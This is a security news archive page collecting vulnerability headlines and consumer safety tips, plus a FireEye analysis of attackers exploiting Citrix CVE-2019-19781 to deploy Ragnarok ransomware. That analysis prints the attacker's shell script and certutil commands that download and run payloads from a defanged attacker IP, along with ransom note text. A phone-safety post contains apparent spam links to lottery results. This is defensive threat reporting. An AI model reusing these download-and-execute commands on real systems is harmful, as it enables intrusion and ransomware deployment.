Category Archives: Vulnerability

Tripwire Patch Priority Index for May 2020

Tripwire’s May 2020 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft, Adobe, SaltStack, and VMware. Up first on the patch priority list this month are patches for VMware vCenter Server and SaltStack Salt. The Metasploit exploit framework has recently integrated exploits for VMware vCenter Server (CVE-2020-3952) and SaltStack Salt (CVE-2020-11652, CVE-2020-11651). Administrators with […]… Read More

The post Tripwire Patch Priority Index for May 2020 appeared first on The State of Security.

Hackers breached six Cisco servers through SaltStack Salt vulnerabilities

Earlier this month, when F-Secure publicly revealed the existence of two vulnerabilities affecting SaltStack Salt and attackers started actively exploiting them, Cisco was among the victims. The revelation was made on Thursday, when Cisco published an advisory saying that, on May 7, 2020, they’ve discovered the compromise of six of their salt-master servers, which are part of the Cisco VIRL-PE (Internet Routing Lab Personal Edition) service infrastructure. About SaltStack Salt, the vulnerabilities, and the problem … More

The post Hackers breached six Cisco servers through SaltStack Salt vulnerabilities appeared first on Help Net Security.

Sandworm Team Exploiting Vulnerability in Exim Mail Transfer Agent

The U.S. National Security Agency (NSA) warned that the Sandworm team is exploiting a vulnerability that affects Exim Mail Transfer Agent (MTA) software. In a cybersecurity advisory published on May 28, the NSA revealed that the Sandworm team has been exploiting the Exim MTA security flaw since August 2019. The vulnerability (CVE-2019-10149) first appeared in […]… Read More

The post Sandworm Team Exploiting Vulnerability in Exim Mail Transfer Agent appeared first on The State of Security.

NSA warns about Sandworm APT exploiting Exim flaw

The Russian APT group Sandworm has been exploiting a critical Exim flaw (CVE-2019-10149) to compromise mail servers since August 2019, the NSA has warned in a security advisory published on Thursday. “When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” they said. The script would then attempt to add privileged … More

The post NSA warns about Sandworm APT exploiting Exim flaw appeared first on Help Net Security.

Despite lower number of vulnerability disclosures, security teams have their work cut out for them

The number of vulnerabilities disclosed in Q1 2020 has decreased by 19.8% compared to Q1 2019, making this likely the only true dip observed within the last 10 years, Risk Based Security reveals. Vulnerabilities of interest disclosed in Q1 2020 Vulnerabilities disclosed in Q1 2020: What happened? Many factors have been identified as potential contributors to this decline, including the COVID-19 pandemic, though its precise impact may not be known for another year. “Although the … More

The post Despite lower number of vulnerability disclosures, security teams have their work cut out for them appeared first on Help Net Security.

StrandHogg 2.0: Critical Android flaw allows app hijacking, data theft

Google has released a patch for CVE-2020-0096, a critical escalation of privilege vulnerability in Android that allows attackers to hijack apps (tasks) on the victim’s device and steal data. Dubbed StrandHogg 2.0 because its similar to the StrandHogg vulnerability exploited by hackers in late 2019, it affects all but the latest version of Android. The good news is, though, that there is no indication it is being actively used by attackers. About StrandHogg 2.0 (CVE-2020-0096) … More

The post StrandHogg 2.0: Critical Android flaw allows app hijacking, data theft appeared first on Help Net Security.

Computer science student discovers privacy flaws in security and doorbell cameras

Ring, Nest, SimpliSafe and eight other manufacturers of internet-connected doorbell and security cameras have been alerted to systemic design flaws discovered by Florida Tech computer science student Blake Janes that allows a shared account that appears to have been removed to actually remain in place with continued access to the video feed. Privacy flaws in security and doorbell cameras Janes discovered the mechanism for removing user accounts does not work as intended on many camera … More

The post Computer science student discovers privacy flaws in security and doorbell cameras appeared first on Help Net Security.

C-suite execs often pressure IT teams to make security exceptions for them

The C-suite is the most likely group within an organization to ask for relaxed mobile security protocols (74%) – despite also being highly targeted by malicious cyberattacks, according to MobileIron. The study combined research from 300 enterprise IT decision makers across Benelux, France, Germany, the U.K. and the U.S., as well as 50 C-level executives from both the U.K. and the U.S. The study revealed that C-level executives feel frustrated by mobile security protocols and … More

The post C-suite execs often pressure IT teams to make security exceptions for them appeared first on Help Net Security.

23% of leading banks had an exposed database with potential data leakage

Reposify unveiled research findings of critical asset exposures and vulnerabilities in attack surfaces of the world’s leading multinational banks. Researchers measured the prevalence of exposed sensitive assets including exposed databases, remote login services, development tools and additional assets for 25 multinational banks and their 350+ subsidiaries. Banks deal with exposed database threat 23% of banks had at least one misconfigured database exposed to the internet resulting in potential data leakage issues 54% of the banks … More

The post 23% of leading banks had an exposed database with potential data leakage appeared first on Help Net Security.

6 Ways to Beat Hackers from Invading Your Phone

Technological advancement has seen smartphones become a crucial part of our lives. There are radical changes that have taken place in the mobile phone industry. What can be done with our computers can be performed using smartphones. They provide instant communication, conduct online transactions, a form of entertainment, education, GPS services, camera, and productivity apps. You can surf the web and get almost any information you need through search engines such as Google, Bing. However, hackers take advantage of these devices and are on the lookout for any small vulnerability to exploit. Hackers would use any means available to hack your phones and steal your personal information, which can be used to access your bank account or conduct transaction through your credit card account.

Below are ways of protecting your smartphones from hackers:

Regular Phone Updates

Your smartphone should be updated whenever the updates are available. Updating the software can be a tedious task that might take longer to complete and usually consume internet bundles. Many smartphone apps can be installed on the phone; always remember to install the recommended apps. Apple phones are much safer in that they would only allow you to install official apps from there Appstore. Installing apps from unofficial tools may download apps with malware, making it easy for hackers to snoop into your phone.

Review Installed Apps

Regularly review the apps installed on your phone to check the security settings on the apps. Whenever you install an app, always read the privacy settings to ensure your privacy is not breached. Software like powerball allows you to read their terms and conditions before installing them, allowing you to choose whether to install or not to install.

Avoid Open Wi-Fi

Open wireless networks can be vulnerable to attack. These attacks can be quite severe, and you may not know who is snooping on your phone within your vicinity. Though these attacks require special software and skills to be successful, the hacker could just be sitting next to you. Therefore, it is advisable to use your mobile network to access the internet or use VPN tools such as Tor to channel your traffic via a secure channel, as this will prevent someone from monitoring your phone.

Enable Phone Tracker 

Your phone can be stolen at any time or get into the wrong hands; it is, therefore, necessary to protect your phone with a passcode. Also, set your phone to wipe the data after a certain number of attempted incorrect passcode entries.

Make use of both Apple and Google “find my device” feature. This will show the location of your phone when it is stolen on a map and enables the operator to erase or lock your phone upon notifying them.

Conclusion

A smartphone is an essential piece of gadgets that lets you perform several activities. Therefore, it’s necessary to protect them from hackers who can monitor and steal your personal information for their interest. Use official apps tool to install or access powerball resultados applications on your smartphones.

The post 6 Ways to Beat Hackers from Invading Your Phone appeared first on .

Cisco fixes critical RCE flaw in call center solution

Cisco has patched a critical remote code execution hole (CVE-2020-3280) in Cisco Unified Contact Center Express, its “contact center in a box” solution, and is urging administrators to upgrade to a fixed software version. About the vulnerability (CVE-2020-3280) Flagged by prolific bug hunter Brenden Meeder of Booz Allen Hamilton, CVE-2020-3280 is a vulnerability in the Java Remote Management Interface of the UCCX solution. “The vulnerability is due to insecure deserialization of user-supplied content by the … More

The post Cisco fixes critical RCE flaw in call center solution appeared first on Help Net Security.

Signal fixes location-revealing flaw, introduces Signal PINs

Signal has fixed a vulnerability affecting its popular eponymous secure communications app that allowed bad actors to discover and track a user’s location. The non profit organization has also announced on Tuesday a new mechanism – Signal PINs – that will, eventually, allow users not to use their phone number as their user ID. About the vulnerability The vulnerability, discovered by Tenable researcher David Wells, stems from the fact that the WebRTC fork used by … More

The post Signal fixes location-revealing flaw, introduces Signal PINs appeared first on Help Net Security.

How secure are open source libraries?

Seven in 10 applications have a security flaw in an open source library, highlighting how use of open source can introduce flaws, increase risk, and add to security debt, a Veracode research reveals. Nearly all modern applications, including those sold commercially, are built using some open source components. A single flaw in one library can cascade to all applications that leverage that code. According to Chris Eng, Chief Research Officer at Veracode, “Open source software … More

The post How secure are open source libraries? appeared first on Help Net Security.

Vulnerability in Qmail mail transport agent allows RCE

Qualys researchers have found a way to exploit an previously known (and very old) vulnerability in Qmail, a secure mail transport agent, to achieve both remote code execution (RCE) and local code execution. The Qmail RCE flaw and other vulnerabilities In 2005, security researcher Georgi Guninski unearthed three vulnerabilities in Qmail, which – due to its simplicity, mutually untrusting modules and other specific development choices made by its creator Daniel J. Bernstein – is still … More

The post Vulnerability in Qmail mail transport agent allows RCE appeared first on Help Net Security.

With the threat landscape continuously changing, businesses must be ready for anything

Despite efforts by organizations to layer up their cyber defenses, the threat landscape is changing, attackers are innovating and automating their attacks, NTT reveals. The threat landscape is changing Referencing the COVID-19 pandemic, the report highlights the challenges that businesses face as cyber criminals look to gain from the global crisis and the importance of secure-by-design and cyber-resilience. The attack data indicates that 55% of all attacks in 2019 were a combination of web-application and … More

The post With the threat landscape continuously changing, businesses must be ready for anything appeared first on Help Net Security.

Businesses vulnerable to emerging risks have a gap in their insurance coverage

The majority of business decision makers are insured against traditional cyber risks, such as breaches of personal information, but most were vulnerable to emerging risks, such as malware and ransomware, revealing a potential insurance coverage gap, according to the Hanover Insurance Group. The report surveyed business decision makers about cyber vulnerabilities and risk mitigation efforts. Insurance purchasing decisions influenced by media coverage Most businesses surveyed indicated they had purchased cyber insurance, and more than 70% … More

The post Businesses vulnerable to emerging risks have a gap in their insurance coverage appeared first on Help Net Security.

The most-targeted security vulnerabilities – despite patches having been available for years

Newly-discovered zero-day vulnerabilities may make the biggest headlines, but that doesn’t mean that they’re necessarily the thing that will get your company hacked.

This week, US-CERT has published its list of the “Top 10 Routinely Exploited Vulnerabilities”.

Read more in my article on the Tripwire State of Security blog.

The top 10 most-targeted security vulnerabilities – despite patches having been available for years

Newly-discovered zero-day vulnerabilities may generate the biggest headlines in the security press, but that doesn’t mean that they’re necessarily the thing that will get your company hacked. This week, US-CERT has published its list of what it describes as the “Top 10 Routinely Exploited Vulnerabilities” for the last three years. The list is designed to […]… Read More

The post The top 10 most-targeted security vulnerabilities – despite patches having been available for years appeared first on The State of Security.

Smashing Security #178: Office pranks, meat dresses, and robocop dogs

Graham shares stories of email storms, Carole describes the steps being taken by firms as they try to coax employees back to the office, and special guest Lisa Forte details a hack that has impacted Lady Gaga and other celebrities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast with computer security veterans Graham Cluley and Carole Theriault.

Keep Website Away From the Hackers, Learn WordPress Security Issues

As much as you love WordPress, hackers also love getting access to its websites. Yes, there is no doubt that it is one of the most popular Content Management Systems. Still, there are always loopholes that pave a path for these black hat hackers to do malicious activities. Each year we hear of many WordPress security issues, and those are very vital to learn. 

It is crucial because once your site gets hacked, it becomes tough to cope up. There are many problems that your brand will have to face if someone hacks it. The first and most significant loss will be the loss of brand reputation that you built hardly over time. Secondly, Google blacklists almost 10,000 plus sites for Malware each day, and your website can also come under that list. Last but not least, there are chances that you might never get the access back to your site.

Therefore it is prevalent to think about this topic if you had been ignoring it for a long time. Here are some of the sore points that occur in WordPress. So quickly get your pen and note these down. 

Note Down the Most Common WordPress Security Issues

Malware Alert!

If you are still unaware of the fact that how the word Malware originated, then you should know it is a combination of two words, malicious and software. Yes, this word is your enemy, but having a bit of knowledge about your foes is also vital. So, it is one of the most common security issues that you might face while working on a website made using WordPress.  

Malware is a malicious code that hackers use to get illegal access to your website, and the information inside it. They inject the infectious codes to the files and folders of the sites to gain control over it. Furthermore, it is one of the widespread WordPress security risks that you must learn. 

But the question here is, how can you detect Malware on your website? Remember, it is very crucial first to analyze whether your site is hacked or not. Once you have confirmed that yes, there is a hack, then move forward. Hence, if you want to know whether Malware is there on your website or not, you can check if there are any modifications in the files and folder.

There are various types of Malware, such as:

  •       Backdoor attacks
  •       Nasty redirects
  •       Driven by downloads

Furthermore, you do not need to panic! One good factor is that, along with the detection of these Malware’s, you can also delete them manually. For this, all you need to have is the backup of the non-infectious files and folder of the website. If you have them, then install a new version and restore the backup.

Brute Force Attacks

Another most common type of attacks done by these black hat hackers is the Brute Force Attacks. It refers to the trial and error method of entering multiple usernames and passwords. Yes, in this way of hacking, these hackers try to insert several combinations repeatedly, unless they hit the right one. 

Furthermore, it is one of the easiest and the most used methods of getting access to your website. The motive of the hackers is to get access to your home page. One disadvantage that you get here is that WordPress does not have any limit to enter the username and password combinations. 

Therefore bots can enter your website conveniently using this method of brute force attack. The best way to be safe from this sort of hack is by creating an extreme and unique username and passwords for your website.

Why The Hackers Create WordPress Security Issues?

There is an infinite number of reasons behind these suspicious minds to hack WordPress security. One cannot judge why these hackers want to get access to sites, which are even not very popular. But there are some of the common motives that you can figure out. Here are some of the reasons:

Get The Access To Crucial Info

Undoubtedly, your website comprises of vital data that is like a treasure for these hackers. The data is just not confined to you; instead, it is also about the information of your customers. Be it your client’s email, their card attached to your site, their contacts, and more; everything comes under this crucial info.

A hacker can use the emails to send spams from your website’s site to hack your user’s account too. They can also insist on your customer to make purchases on your behalf to gain black money.

Attacking Other Websites

Sometimes the hacker also plays ladder games. There are chances that these people hack a small site first to each a huge site after. Hackers attack your website to pave their path towards something bigger and significant.

Conclusion

So these were some of the fundamental and most common WordPress security issues that one might face. So, be careful and be safe!

The post Keep Website Away From the Hackers, Learn WordPress Security Issues appeared first on .

How Secure Is Video Conferencing?

As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has quickly become the new norm. Whether you’re attending regular work meetings, partaking in a virtual happy hour with friends, or catching up with extended family across the globe, video conferencing is a convenient alternative to many of the activities we can no longer do in real life. But as the rapid adoption of video conferencing tools and apps occurs, is security falling by the wayside?  

Avoid Virtual Party Crashers

One security vulnerability that has recently made headlines is the ability for uninvited attendees to bombard users’ virtual meetings. How? According to Forbes, many users have posted their meeting invite links on social media sites like Twitter. An attacker can simply click on one of these links and interrupt an important conference call or meeting with inappropriate content.  

Ensure Data is in the Right Hands

Online conferencing tools allow users to hold virtual meetings and share files via chat. But according to Security Boulevard, communicating confidential business information quickly and privately can be challenging with these tools. For example, users are not always immediately available, even when working from home. In fact, many parents are simultaneously doubling as working parents and teachers with the recent closure of schools and childcare providers. If a user needs to share private information with a coworker but they are unable to connect by video or phone, they might revert to using a messaging platform that lacks end-to-end encryptiona feature that prevents third-party recipients from seeing private messages. This could lead to leaks or unintended sharing of confidential data, whether personal or corporate. What’s more, the lack of using a secure messaging platform could present a hacker with an opportunity to breach a victim’s data or deviceDepending on the severity of this type of breach, a victim could be at risk of identity theft 

Pay Attention to Privacy Policies

With the recent surge of new video conferencing users, privacy policies have been placed under a microscope. According to WIRED, some online conferencing tools have had to update their policies to reflect the collection of user information and meeting content used for advertising or other marketing efforts. Another privacy concern was brought to light by a video conferencing tool’s attention-tracking feature. This alerts the virtual meeting host when an attendee hasn’t had the meeting window in their device foreground for 30 seconds, resulting in users feeling that their privacy has been compromised.  

How to Secure Video Conferences

As users become accustomed to working from home, video conferencing tools will continue to become a necessary avenue for virtual communication. But how can users do so while putting their online security first? Follow these tips to help ensure that your virtual meetings are safeguarded:  

Do your research

There are plenty of video conferencing tools available online. Before downloading the first one you see, do your research and check for possible security vulnerabilities around the tools. Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.  

Make your meetings password protected

To ensure that only invited attendees can access your meeting, make sure they are password protected. For maximum safety, activate passwords for new meetings, instant meetings, personal meetings, and people joining by phone. 

Block users from taking control of the screen

To keep users (either welcome or unwelcome) from taking control of your screen while you’re video conferencing, select the option to block everyone except the host (you) from screen sharing.  

Turn on automatic updates

By turning on automatic updates, you are guaranteed to have all the latest security patches and enhancements for your video conferencing tool as soon as they become available.  

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How Secure Is Video Conferencing? appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

protecting kids online

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh, cry, and influence her routine and emotions.

Protecting kids online

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities: Securing devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world is more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, SmartTVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (use your password) and why passwords are necessary. Get into the habit of using 2-factor authentication for passwords and locking your device home screens with a pin code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills process information or to be alone online. If you allow younger kids online, consider sitting with them, and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.protecting kids online
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact with the online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing on a secure network (VPN, Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child how the private encryption “tunnel” your content (searches, activity, messages) passes through and how that keeps other people from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shape the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

WhatsApp Users: Secure Your Desktop With These Tips

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, a researcher from The Hacker News recently disclosed multiple vulnerabilities in WhatsApp which, if exploited, could allow remote attackers to compromise the security of billions of users.

How safe is WhatsApp?

According to researcher Gal Weizman, the flaws were found in WhatsApp Web, the browser version of the messaging platform. Weizman revealed that WhatsApp Web was vulnerable to an open-redirect flaw, which allows remote hackers to redirect victims to suspicious, arbitrary websites. If a hacker sent an unsuspecting victim a message containing one of these arbitrary links, they could then trigger cross-site scripting attacks. These attacks are often found in web applications and can be used by hackers to bypass access controls by injecting malicious code into trusted websites.

WhatsApp Web hack

If the victim clicks on the link in the message, the hacker could remotely gain access to all the files from their Windows or Mac computer, which increases the risk for identity theft. What’s more, the open-redirect flaw could have also been used to manipulate previews of the domain WhatsApp displays when links are sent through their platform. This provides hackers with another avenue to trick users into falling for phishing attacks.

 

How to stay safe

How can users continue to use messaging platforms like WhatsApp without putting themselves at risk of an attack? Follow these security tips for greater peace of mind:

  • Update, update, update. If you’re a WhatsApp Web user, be sure to update to the latest version to install the security patch for this flaw.
  • Think before you click. Be skeptical of ads shared on social media sites and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message from an unknown sender, it’s best to avoid interacting with the message.
  • Hover over links to see and verify the URL. If someone you don’t know sends you a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename

Functionality

MD5

x86.dll

32-bit Downloader

9aa67d856e584b4eefc4791d2634476a

x64.dll

64-bit Downloader

55b40e0068429fbbb16f2113d6842ed2

scan.py

Python socket scanner

b0acb27273563a5a2a5f71165606808c

xp_eternalblue.replay

Exploit replay file

6cf1857e569432fcfc8e506c8b0db635

eternalblue.replay

Exploit replay file

9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type

Indicator

Notes

Network

45[.]120[.]53[.]214

 

Network

198[.]44[.]227[.]126

 

Host

91dd06f49b09a2242d4085703599b7a7

piz.Lan

Host

01af5ad23a282d0fd40597c1024307ca

de.py

Host

bd977d9d2b68dd9b12a3878edd192319

ld.sh

Host

0caf9be8fd7ba5b605b7a7b315ef17a0

.new.zip

Host

9aa67d856e584b4eefc4791d2634476a

x86.dll

Host

55b40e0068429fbbb16f2113d6842ed2

x64.dll

Host

b0acb27273563a5a2a5f71165606808c

scan.py

Host

6cf1857e569432fcfc8e506c8b0db635

xp_eternalblue.replay

Host

9e408d947ceba27259e2a9a5c71a75a8

eternalblue.replay

Host

e345c861058a18510e7c4bb616e3fd9f

avpass.exe

Host

48452dd2506831d0b340e45b08799623

since1969.exe

Email Address

asgardmaster5@protonmail[.]com

From ransom note

Email Address

ragnar0k@ctemplar[.]com

From ransom note

Email Address

j.jasonm@yandex[.]com

From ransom note

Table 3: Collection of IOCs from this blog post

What Is the CurveBall Bug? Here’s What You Need to Know 

Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information.

How It Works 

So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones.  When this vulnerability is exploited, CurveBall could allow a hacker to launch man-in-the-middle attacks, which is when a hacker secretly relays and possibly alters the communications between two unsuspecting users. Additionally, a hacker could use the vulnerability to intercept and fake secure web (HTTPS) connections or fake signatures for files and emails. Essentially, this means a hacker could place harmful files or run undetected malware on a system.

What It Impacts 

There are still questions surrounding what exactly is impacted by CurveBall, and subsequently what could be affected by the new code. According to Microsoft, CurveBall impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. With three popular operating systems afflicted, and the possibility to bypass basic security safeguards, patching is more important than ever. For unpatched systems, malware that takes advantage of this vulnerability may go undetected and slip past security features.

How to Stay Protected 

